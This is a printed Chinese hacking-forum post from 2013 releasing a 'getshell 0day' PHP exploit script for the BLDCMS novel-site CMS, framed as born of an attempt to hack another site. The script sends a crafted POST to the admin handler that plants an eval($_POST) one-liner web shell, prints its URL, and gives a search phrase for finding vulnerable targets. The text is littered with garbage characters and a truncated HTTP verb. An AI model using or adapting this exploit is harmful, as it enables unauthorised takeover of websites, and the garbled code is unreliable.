中国网络渗透测试联盟

标题: BLDCMS(白老大小说) Getshell 0day EXP [打印本页]

作者: admin    时间: 2013-3-26 20:49
标题: BLDCMS(白老大小说) Getshell 0day EXP
之前想搞一个黑阔站 发现旁站有一个站用了BLDCMS 我就下载看了.. 找到了一个getshell漏洞
9 F! g  @3 k+ x5 w0 `' v' p8 d: A  R3 }7 k# Q2 v0 i+ v" @

1 ~( u+ n% D  k( ~7 }+ f. ]4 g& a话说昨晚晴天小铸在90sec发现有人把这getshell漏洞的分析发出来了 擦 居然被人先发了 * b; S( i: c9 D& `: k' g) a, a. ^9 M
6 j2 s) ]# D$ Z! I
既然都有人发了 我就把我之前写好的EXP放出来吧
2 ~2 b6 m7 H9 X6 n# f8 K4 h
* v% n/ t/ k5 H  ^view source print?01.php;">
7 j8 l  s( W2 R02.<!--?php
! Y# T: t2 M: M  I03.echo "-------------------------------------------------------------------' H: ]' C' P% G; B+ j
04.
5 i  _3 S4 J2 M8 n: ?4 F05.------------\r\n              BLDCMS(白老大php小说小偷) GETSHELL 0DAY EXP
) _( q+ q: @3 _& u. L2 K0 t3 }* Z06. - F  ~5 ?; A6 s# e1 M) B$ C5 c% _
07.(GPC=Off)\r\n            Vulnerability discovery&Code by 数据流@wooyun
" T5 l, I) Z" _, F08. : E( w2 i) Q- P
09.QQ:981009941\r\n                                2013.3.21\r\n            
4 C+ p  F4 u2 l% H: b! u10.
+ {3 D/ B7 K4 Y! M2 H' T11.
$ ]. [! M* L  t# K6 ~% k; h12.用法:php.exe EXP.php www.baidu.com /cms/ pass(一句话密码  n% B! F& P0 \
13.
6 M) e$ M- ~" ]( T8 w14.)\r\n                    搜索关键字:\"开发者: 白老大小说\"\r\n-----------7 z  V0 J6 b/ [4 V" S2 f: i
15. ( p; f' E; o, t
16.--------------------------------------------------------------------\r\n";
, w4 O; m. c# J' w6 Y+ @17.$url=$argv[1];
' j' E& |" I4 F: b/ C9 s! A# O, a0 h18.$dir=$argv[2];) G# w4 d5 r) B) ?+ w% [& ], Y: t. H
19.$pass=$argv[3];) w/ f( ~7 Z+ Z* P; B
20.$eval='\';eval($_POST['.'"'.$pass.'"'.']);\'';
! U0 C. I, p+ A0 o/ s! s  j21.if (emptyempty($pass)||emptyempty($url))
; x* S- K8 J, m) c2 j( y2 ]- n22.{exit("请输入参数");}% x9 `9 {6 p6 v8 D" m. s$ n
23.else
( t& L. L, h$ v* x& g# [  @24.{
( w( i6 l1 ~: @7 g  I25.$fuckdata='sitename=a&qq=1&getcontent=acurl&tongji=a&cmsmd5=1&sqlite='.$ev" V: }. ?6 B* r7 Z" g
26.
' ?. c9 J0 ~' g27.al;
7 m' }; P5 D+ P5 e8 O, M+ P28.$length = strlen($fuckdata);4 C0 \, G, y0 h7 Y
29.function getshell($url,$pass)
6 \8 ]! j/ U+ Y9 |9 l30.{
3 P6 G; L0 _0 I+ y4 @# \+ j31.global $url,$dir,$pass,$eval,$length,$fuckdata;* W0 e# p* @4 W; y7 k
32.$header = "OST /admin/chuli.php?action=a_1 HTTP/1.1\r\n";
6 j& v7 F$ B1 C. l; O8 |# V33.$header .= "Content-Type: application/x-www-form-urlencoded\r\n";
) V3 @5 S$ ~6 j! U* c34.$header .= "User-Agent: MSIE\r\n";
% p# w6 y% g5 p: m- f2 ^; m35.$header .= "Host:".$url."\r\n";+ \+ q- s" n5 F$ z5 D! C
36.$header .= "Content-Length: ".$length."\r\n";
+ ?3 ?( j$ ~7 p3 W" n+ C( O37.$header .= "Connection: Close\r\n";
" }4 c1 c9 Q' F38.$header .="\r\n";7 ~1 B1 c4 V/ l8 n) y1 F
39.$header .= $fuckdata."\r\n\r\n";
! B8 _, q, I6 y) L& y40.$fp = fsockopen($url, 80,$errno,$errstr,15);
9 o; f7 R( {% L9 I41.if (!$fp)
& L9 Q; v0 \8 J. H42.{
1 ]) D2 c4 o2 H43.exit ("利用失败:请检查指定目标是否能正常打开");
% _& A3 Z9 [3 p' |9 b* b44.}
  `: Y5 ?& q. V$ o5 @* @# y9 T45.else{ if (!fputs($fp,$header))! ]6 Z9 ]4 g0 B) Z/ q
46.{exit ("利用失败");}9 a6 p2 R6 U1 |
47.else
! L) c* T$ O1 a+ w48.{2 e- M$ R8 Y! U9 ~9 ^+ H
49.$receive = '';$ Z: |! w& c7 c9 z& |8 a: }
50.while (!feof($fp)) {, p& }" r3 f1 `5 ^
51.$receive .= @fgets($fp, 1000);6 G2 R# P& N. D$ h, w, T. @3 l
52.}
) t0 B3 V9 n- x3 D* q1 v4 B0 k- t53.@fclose($fp);
% L# J( \' {& _1 y1 r4 l54.echo "$url/$dir/conn/config/normal2.php passpass(如连接失败 请检查目标
7 e8 ]$ v" d' b' \. I* c4 _5 F+ l5 i55. 1 {( b" \+ l9 q5 v/ S
56.GPC是否=off)";1 z, Y$ k0 ?# P# l. s  c
57.}}
( Y* f4 ^  I! }9 J( H) R% _" p! S58.}
) g) m$ l6 ^. ?" V59.}
. _! c4 H1 ~* z- x+ x. U5 y3 d6 V60.getshell($url,$pass);% p, M- v$ r: v, E
61.?-->1 Z2 Q$ P. ?( P
/ D, `+ t  n0 i6 M! V' @
- b7 Q- `! }  B) d1 t* q

0 Y( [2 o' D; R( ~* _* t+ Hby 数据流
1 w: {1 Z. m' ?* s* n# ?2 G& T2 [) e0 r




欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/) Powered by Discuz! X3.2